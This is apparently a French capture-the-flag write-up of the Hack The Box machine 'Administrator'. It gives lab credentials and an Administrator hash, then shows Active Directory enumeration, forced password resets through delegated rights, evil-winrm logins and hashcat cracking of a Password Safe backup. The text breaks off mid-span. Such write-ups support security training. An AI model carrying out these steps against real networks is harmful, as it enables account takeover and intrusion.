<tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Administrator</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.42</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">Olivia : ichliebedich </span></span><span class="line"><span class="cl">alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span class="cl">emily:UXLCI5iETUsIBoFVTj8yQFKoHjXmb </span></span><span class="line"><span class="cl">emma:WwANQWnmJnGV07WQN8bMS7FMAbjNur </span></span><span class="line"><span class="cl">ethan : limpbizkit </span></span><span class="line"><span class="cl">Administrator : 3dc553ce4b9fd20bd016e098d2d2fd2e </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="threader-3000">Threader 3000 </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span><span class="lnt">55 </span><span class="lnt">56 </span><span class="lnt">57 </span><span class="lnt">58 </span><span class="lnt">59 </span><span class="lnt">60 </span><span class="lnt">61 </span><span class="lnt">62 </span><span class="lnt">63 </span><span class="lnt">64 </span><span class="lnt">65 </span><span class="lnt">66 </span><span class="lnt">67 </span><span class="lnt">68 </span><span class="lnt">69 </span><span class="lnt">70 </span><span class="lnt">71 </span><span class="lnt">72 </span><span class="lnt">73 </span><span class="lnt">74 </span><span class="lnt">75 </span><span class="lnt">76 </span><span class="lnt">77 </span><span class="lnt">78 </span><span class="lnt">79 </span><span class="lnt">80 </span><span class="lnt">81 </span><span class="lnt">82 </span><span class="lnt">83 </span><span class="lnt">84 </span><span class="lnt">85 </span><span class="lnt">86 </span><span class="lnt">87 </span><span class="lnt">88 </span><span class="lnt">89 </span><span class="lnt">90 </span><span class="lnt">91 </span><span class="lnt">92 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"> Threader <span class="m">3000</span> - Multi-threaded Port Scanner </span></span><span class="line"><span class="cl"> Version 1.0.7 </span></span><span class="line"><span class="cl"> A project by The Mayor </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Enter your target IP address or URL here: 10.10.11.42 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Scanning target 10.10.11.42 </span></span><span class="line"><span class="cl">Time started: 2024-11-27 14:54:16.528194 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Port <span class="m">21</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">139</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">135</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">88</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">464</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">445</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">389</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">593</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">636</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">3268</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">3269</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">5985</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">9389</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">47001</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49665</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49668</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49664</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49666</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">49670</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53246</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53276</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53268</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53251</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">53313</span> is open </span></span><span class="line"><span class="cl">Port <span class="m">63231</span> is open </span></span><span class="line"><span class="cl">Port scan completed in 0:00:08.796993 </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Threader3000 recommends the following Nmap scan: </span></span><span class="line"><span class="cl">************************************************************ </span></span><span class="line"><span class="cl">nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 </span></span><span class="line"><span class="cl">************************************************************ </span></span><span class="line"><span class="cl">Would you like to run Nmap or quit to terminal? </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl"><span class="nv">1</span> <span class="o">=</span> Run suggested Nmap scan </span></span><span class="line"><span class="cl"><span class="nv">2</span> <span class="o">=</span> Run another Threader3000 scan </span></span><span class="line"><span class="cl"><span class="nv">3</span> <span class="o">=</span> Exit to terminal </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Option Selection: <span class="m">1</span> </span></span><span class="line"><span class="cl">nmap -p21,53,139,135,88,464,445,389,593,636,3268,3269,5985,9389,47001,49665,49668,49664,49666,49670,53246,53276,53268,53251,53313,63231 -sV -sC -T4 -Pn -oA 10.10.11.42 10.10.11.42 </span></span><span class="line"><span class="cl">Starting Nmap 7.80 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-11-27 14:55 CET </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> 10.10.11.42 </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.038s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">21/tcp closed ftp </span></span><span class="line"><span class="cl">53/tcp closed domain </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-11-27 20:55:50Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp closed ldap </span></span><span class="line"><span class="cl">445/tcp closed microsoft-ds </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp closed http-rpc-epmap </span></span><span class="line"><span class="cl">636/tcp closed ldapssl </span></span><span class="line"><span class="cl">3268/tcp closed globalcatLDAP </span></span><span class="line"><span class="cl">3269/tcp closed globalcatLDAPssl </span></span><span class="line"><span class="cl">5985/tcp closed wsman </span></span><span class="line"><span class="cl">9389/tcp closed adws </span></span><span class="line"><span class="cl">47001/tcp closed winrm </span></span><span class="line"><span class="cl">49664/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49665/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49666/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">49668/tcp closed unknown </span></span><span class="line"><span class="cl">49670/tcp closed unknown </span></span><span class="line"><span class="cl">53246/tcp closed unknown </span></span><span class="line"><span class="cl">53251/tcp closed unknown </span></span><span class="line"><span class="cl">53268/tcp closed unknown </span></span><span class="line"><span class="cl">53276/tcp closed unknown </span></span><span class="line"><span class="cl">53313/tcp closed unknown </span></span><span class="line"><span class="cl">63231/tcp closed unknown </span></span><span class="line"><span class="cl">Service Info: OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-security-mode: SMB: Couldn<span class="err">&#39;</span>t find a NetBIOS name that works <span class="k">for</span> the server. Sorry! </span></span><span class="line"><span class="cl"><span class="p">|</span>_smb2-time: ERROR: Script execution failed <span class="o">(</span>use -d to debug<span class="o">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 65.94 seconds </span></span><span class="line"><span class="cl">------------------------------------------------------------ </span></span><span class="line"><span class="cl">Combined scan completed in 0:02:32.888755 </span></span></code></pre></td></tr></table> </div> </div><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">nmap 10.10.11.42 -sV -sC -T4 -Pn </span></span><span class="line"><span class="cl">Starting Nmap 7.94SVN <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-11-30 18:52 EST </span></span><span class="line"><span class="cl">Nmap scan report <span class="k">for</span> administrator.htb <span class="o">(</span>10.10.11.42<span class="o">)</span> </span></span><span class="line"><span class="cl">Host is up <span class="o">(</span>0.072s latency<span class="o">)</span>. </span></span><span class="line"><span class="cl">Not shown: <span class="m">988</span> closed tcp ports <span class="o">(</span>conn-refused<span class="o">)</span> </span></span><span class="line"><span class="cl">PORT STATE SERVICE VERSION </span></span><span class="line"><span class="cl">21/tcp open ftp Microsoft ftpd </span></span><span class="line"><span class="cl"><span class="p">|</span> ftp-syst: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ SYST: Windows_NT </span></span><span class="line"><span class="cl">53/tcp open domain Simple DNS Plus </span></span><span class="line"><span class="cl">88/tcp open kerberos-sec Microsoft Windows Kerberos <span class="o">(</span>server time: 2024-12-01 06:52:33Z<span class="o">)</span> </span></span><span class="line"><span class="cl">135/tcp open msrpc Microsoft Windows RPC </span></span><span class="line"><span class="cl">139/tcp open netbios-ssn Microsoft Windows netbios-ssn </span></span><span class="line"><span class="cl">389/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: administrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">445/tcp open microsoft-ds? </span></span><span class="line"><span class="cl">464/tcp open kpasswd5? </span></span><span class="line"><span class="cl">593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 </span></span><span class="line"><span class="cl">636/tcp open tcpwrapped </span></span><span class="line"><span class="cl">3268/tcp open ldap Microsoft Windows Active Directory LDAP <span class="o">(</span>Domain: administrator.htb0., Site: Default-First-Site-Name<span class="o">)</span> </span></span><span class="line"><span class="cl">3269/tcp open tcpwrapped </span></span><span class="line"><span class="cl">Service Info: Host: DC<span class="p">;</span> OS: Windows<span class="p">;</span> CPE: cpe:/o:microsoft:windows </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host script results: </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-security-mode: </span></span><span class="line"><span class="cl"><span class="p">|</span> 3:1:1: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Message signing enabled and required </span></span><span class="line"><span class="cl"><span class="p">|</span> smb2-time: </span></span><span class="line"><span class="cl"><span class="p">|</span> date: 2024-12-01T06:52:40 </span></span><span class="line"><span class="cl"><span class="p">|</span>_ start_date: N/A </span></span><span class="line"><span class="cl"><span class="p">|</span>_clock-skew: 7h00m02s </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . </span></span><span class="line"><span class="cl">Nmap <span class="k">done</span>: <span class="m">1</span> IP address <span class="o">(</span><span class="m">1</span> host up<span class="o">)</span> scanned in 21.37 seconds </span></span></code></pre></td></tr></table> </div> </div><h3 id="rpcclient-enumusers">rpcclient enumusers </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">rpcclient -U Olivia%ichliebedich 10.10.11.42 -c <span class="s2">&#34;enumdomusers&#34;</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>Administrator<span class="o">]</span> rid:<span class="o">[</span>0x1f4<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>Guest<span class="o">]</span> rid:<span class="o">[</span>0x1f5<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>krbtgt<span class="o">]</span> rid:<span class="o">[</span>0x1f6<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>olivia<span class="o">]</span> rid:<span class="o">[</span>0x454<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>michael<span class="o">]</span> rid:<span class="o">[</span>0x455<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>benjamin<span class="o">]</span> rid:<span class="o">[</span>0x456<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>emily<span class="o">]</span> rid:<span class="o">[</span>0x458<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>ethan<span class="o">]</span> rid:<span class="o">[</span>0x459<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>alexander<span class="o">]</span> rid:<span class="o">[</span>0xe11<span class="o">]</span> </span></span><span class="line"><span class="cl">user:<span class="o">[</span>emma<span class="o">]</span> rid:<span class="o">[</span>0xe12<span class="o">]</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="smbclient">smbclient </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">smbclient -L //10.10.11.42 -U Olivia%ichliebedich </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> Sharename Type Comment </span></span><span class="line"><span class="cl"> --------- ---- ------- </span></span><span class="line"><span class="cl"> ADMIN$ Disk Remote Admin </span></span><span class="line"><span class="cl"> C$ Disk Default share </span></span><span class="line"><span class="cl"> IPC$ IPC Remote IPC </span></span><span class="line"><span class="cl"> NETLOGON Disk Logon server share </span></span><span class="line"><span class="cl"> SYSVOL Disk Logon server share </span></span><span class="line"><span class="cl">Reconnecting with SMB1 <span class="k">for</span> workgroup listing. </span></span><span class="line"><span class="cl">do_connect: Connection to 10.10.11.42 failed <span class="o">(</span>Error NT_STATUS_RESOURCE_NAME_NOT_FOUND<span class="o">)</span> </span></span><span class="line"><span class="cl">Unable to connect with SMB1 -- no workgroup available </span></span></code></pre></td></tr></table> </div> </div><h3 id="sharphound">SharpHound </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">upload SharpHound.ps1 . </span></span></code></pre></td></tr></table> </div> </div><h3 id="bloodhound">Bloodhound </h3><p>On importe les données obtenu. Puis on voit que Olivia a des acces generic All sur Michael. On peut alors changer son mot de passe:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1">## Olivia : Droits GenericAll sur l&#39;utilisateur Michael</span> </span></span><span class="line"><span class="cl"> Set-ADAccountPassword -Identity <span class="s2">&#34;Michael&#34;</span> -NewPassword <span class="o">(</span>ConvertTo-SecureString -AsPlainText <span class="s2">&#34;azertyazerty&#34;</span> -Force<span class="o">)</span> -Reset </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Connexion avec le compte de Michael</span> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u Michael -p azertyazerty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Michael : Droits ForceChangePassword</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## D&#39;abord, il faut ajouter PowerView.ps1 pour obtenir certaines commandes dans</span> </span></span><span class="line"><span class="cl"><span class="c1">## le powershell de Evil-Winrm</span> </span></span><span class="line"><span class="cl">upload PowerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## On load powerview dans le powershell</span> </span></span><span class="line"><span class="cl"><span class="c1">## On met un &#34;.&#34; devant pour charger dans l&#39;environnement powershell actuelle et pas dans un sous-environnement</span> </span></span><span class="line"><span class="cl">. .<span class="se">\P</span>owerView.ps1 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Changement du mot de passe de Benjamin</span> </span></span><span class="line"><span class="cl">Set-DomainUserPassword -Identity Benjamin -AccountPassword <span class="o">(</span>ConvertTo-SecureString <span class="s1">&#39;azertyazerty&#39;</span> -AsPlainText -Force<span class="o">)</span> -Verbose </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## Connexion avec l&#39;utilisateur Benjamin</span> </span></span><span class="line"><span class="cl">evil-winrm -i 10.10.11.42 -u Benjamin -p azertyazerty </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## RIEN !</span> </span></span><span class="line"><span class="cl">smbclient </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="c1">## FTP</span> </span></span><span class="line"><span class="cl">ftp 10.10.11.42 </span></span><span class="line"><span class="cl">&gt; get Backup.psafe3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="bruteforce-backuppsafe3">Bruteforce Backup.psafe3 </h3><p>On bruteforce le password maitre du fichier Backup.psafe3 qui est un fichier password safe. Pour cela, on utilise <code>hashcat</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span><span class="lnt">33 </span><span class="lnt">34 </span><span class="lnt">35 </span><span class="lnt">36 </span><span class="lnt">37 </span><span class="lnt">38 </span><span class="lnt">39 </span><span class="lnt">40 </span><span class="lnt">41 </span><span class="lnt">42 </span><span class="lnt">43 </span><span class="lnt">44 </span><span class="lnt">45 </span><span class="lnt">46 </span><span class="lnt">47 </span><span class="lnt">48 </span><span class="lnt">49 </span><span class="lnt">50 </span><span class="lnt">51 </span><span class="lnt">52 </span><span class="lnt">53 </span><span class="lnt">54 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">5200</span> -a <span class="m">0</span> Backup.psafe3 ~/wordlists/rockyou.txt </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">hashcat <span class="o">(</span>v6.2.5<span class="o">)</span> starting </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">OpenCL API <span class="o">(</span>OpenCL 2.0 pocl 1.8 Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG<span class="o">)</span> - Platform <span class="c1">#1 [The pocl project]</span> </span></span><span class="line"><span class="cl"><span class="o">=====================================================================================================================================</span> </span></span><span class="line"><span class="cl">* Device <span class="c1">#1: pthread-Intel(R) Core(TM) i7-10510U CPU @ 1.80GHz, 6839/13742 MB (2048 MB allocatable), 8MCU</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Minimum password length supported by kernel: <span class="m">0</span> </span></span><span class="line"><span class="cl">Maximum password length supported by kernel: <span class="m">256</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Hashes: <span class="m">1</span> digests<span class="p">;</span> <span class="m">1</span> unique digests, <span class="m">1</span> unique salts </span></span><span class="line"><span class="cl">Bitmaps: <span class="m">16</span> bits, <span class="m">65536</span> entries, 0x0000ffff mask, <span class="m">262144</span> bytes, 5/13 rotates </span></span><span class="line"><span class="cl">Rules: <span class="m">1</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Optimizers applied: </span></span><span class="line"><span class="cl">* Zero-Byte </span></span><span class="line"><span class="cl">* Single-Hash </span></span><span class="line"><span class="cl">* Single-Salt </span></span><span class="line"><span class="cl">* Slow-Hash-SIMD-LOOP </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Watchdog: Temperature abort trigger <span class="nb">set</span> to 90c </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Host memory required <span class="k">for</span> this attack: <span class="m">2</span> MB </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Dictionary cache hit: </span></span><span class="line"><span class="cl">* Filename..: /home/leopold/wordlists/rockyou.txt </span></span><span class="line"><span class="cl">* Passwords.: <span class="m">14344385</span> </span></span><span class="line"><span class="cl">* Bytes.....: <span class="m">139922195</span> </span></span><span class="line"><span class="cl">* Keyspace..: <span class="m">14344385</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Backup.psafe3:tekieromucho </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Session..........: hashcat </span></span><span class="line"><span class="cl">Status...........: Cracked </span></span><span class="line"><span class="cl">Hash.Mode........: <span class="m">5200</span> <span class="o">(</span>Password Safe v3<span class="o">)</span> </span></span><span class="line"><span class="cl">Hash.Target......: Backup.psafe3 </span></span><span class="line"><span class="cl">Time.Started.....: Thu Nov <span class="m">28</span> 15:13:47 <span class="m">2024</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Time.Estimated...: Thu Nov <span class="m">28</span> 15:13:47 <span class="m">2024</span> <span class="o">(</span><span class="m">0</span> secs<span class="o">)</span> </span></span><span class="line"><span class="cl">Kernel.Feature...: Pure Kernel </span></span><span class="line"><span class="cl">Guess.Base.......: File <span class="o">(</span>/home/leopold/wordlists/rockyou.txt<span class="o">)</span> </span></span><span class="line"><span class="cl">Guess.Queue......: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Speed.#1.........: <span class="m">27754</span> H/s <span class="o">(</span>5.85ms<span class="o">)</span> @ Accel:64 Loops:1024 Thr:1 Vec:8 </span></span><span class="line"><span class="cl">Recovered........: 1/1 <span class="o">(</span>100.00%<span class="o">)</span> Digests </span></span><span class="line"><span class="cl">Progress.........: 5120/14344385 <span class="o">(</span>0.04%<span class="o">)</span> </span></span><span class="line"><span class="cl">Rejected.........: 0/5120 <span class="o">(</span>0.00%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Point....: 4608/14344385 <span class="o">(</span>0.03%<span class="o">)</span> </span></span><span class="line"><span class="cl">Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:2048-2049 </span></span><span class="line"><span class="cl">Candidate.Engine.: Device Generator </span></span><span class="line"><span class="cl">Candidates.#1....: Liverpool -&gt; babygrl </span></span><span class="line"><span class="cl">Hardware.Mon.#1..: Temp: 60c Util: 22% </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">Started: Thu Nov <span class="m">28</span> 15:13:27 <span class="m">2024</span> </span></span><span class="line"><span class="cl">Stopped: Thu Nov <span class="m">28</span> 15:13:48 <span class="m">2024</span> </span></span></code></pre></td></tr></table> </div> </div><h3 id="passwordsafe">PasswordSafe </h3><p>On installe <code>pwsafe</code> puis on ouvre la base de donnée avec le mot de passe trouvé <strong>tekieromucho</strong>.</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">sudo apt isntall pwsafe </span></span><span class="line"><span class="cl">pwsafe ./Backup.psafe3 </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">alexander:UrkIbagoxMyUGw0aPlj9B0AXSea4Sw </span></span><span class="line"><span 